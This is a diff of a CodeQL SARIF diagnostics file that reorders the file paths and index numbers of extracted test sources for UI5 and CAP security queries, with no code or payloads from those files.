"uriBaseId" : "%SRCROOT%", "index" : 192 } 
@@ -8066,7 +8066,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 193 } @@ -8092,7 +8092,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 194 } @@ -8118,7 +8118,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", "index" : 195 } @@ -8222,7 +8222,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 199 } @@ -8248,7 +8248,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 200 } 
@@ -8274,7 +8274,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", "uriBaseId" : "%SRCROOT%", "index" : 201 } @@ -8300,7 +8300,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 202 } @@ -8326,7 +8326,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 203 } @@ -8352,7 +8352,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 204 } @@ -8456,7 +8456,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 208 } 
@@ -8482,7 +8482,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 209 } @@ -8508,7 +8508,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 210 } @@ -8534,7 +8534,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 211 } @@ -8560,7 +8560,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 212 } @@ -8612,7 +8612,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 214 } 
@@ -8638,7 +8638,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 215 } @@ -8664,7 +8664,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 216 } @@ -8742,7 +8742,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 219 } @@ -8768,7 +8768,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 220 } @@ -8820,7 +8820,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 222 } 
@@ -8846,7 +8846,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 223 } @@ -8872,7 +8872,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 224 } @@ -8898,7 +8898,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 225 } @@ -8924,7 +8924,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 226 } @@ -8950,7 +8950,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 227 } 
@@ -8976,7 +8976,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 228 } @@ -9106,7 +9106,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 233 } @@ -9132,7 +9132,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 234 } @@ -9158,7 +9158,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 235 } @@ -9184,9 +9184,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 0 + "index" : 236 } } } ], 
@@ -9210,9 +9210,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", - "index" : 236 + "index" : 237 } } } ], @@ -9238,7 +9238,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 237 + "index" : 238 } } } ], @@ -9262,9 +9262,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", "uriBaseId" : "%SRCROOT%", - "index" : 238 + "index" : 0 } } } ], @@ -12278,7 +12278,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 354 } @@ -12304,7 +12304,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 355 } @@ -12330,7 +12330,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", "index" : 356 } 
@@ -12356,7 +12356,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 357 } @@ -12382,7 +12382,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 358 } @@ -12408,7 +12408,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 359 } @@ -12434,7 +12434,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 360 } @@ -12460,7 +12460,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", "index" : 361 } @@ -12486,7 +12486,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 362 } 
@@ -12538,7 +12538,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 364 } @@ -12564,7 +12564,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 365 } @@ -12980,7 +12980,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 381 } @@ -13110,7 +13110,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", "index" : 386 } @@ -13136,7 +13136,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 387 } @@ -13292,7 +13292,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 393 } 
@@ -13318,7 +13318,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 394 } @@ -13396,7 +13396,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 397 } @@ -13422,7 +13422,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 398 } 
@@ -13526,215 +13526,215 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { 
- "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { 
- "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + 
}, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 410 } @@ -13760,9 +13760,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/heuristic-models/tests/Sources/test.js", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 4 } } } ], @@ -13786,9 +13786,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", - "index" : 4 + "index" : 411 } } } ], @@ -13812,7 +13812,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/heuristic-models/tests/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 412 } @@ -13838,7 +13838,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 413 } @@ -13864,7 +13864,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "qlt.conf.json", + "uri" : "scripts/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 414 } @@ -13890,7 +13890,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "scripts/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 415 } @@ -13916,7 +13916,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 416 } 
@@ -13985,13 +13985,13 @@ } }, { "location" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 7 } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : ".github/codeql/codeql-config.yaml", "uriBaseId" : "%SRCROOT%", "index" : 8 } @@ -14009,13 +14009,13 @@ } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", "uriBaseId" : "%SRCROOT%", "index" : 11 } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 12 } @@ -14063,19 +14063,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 20 } }, { "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 21 } }, { "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 22 } 
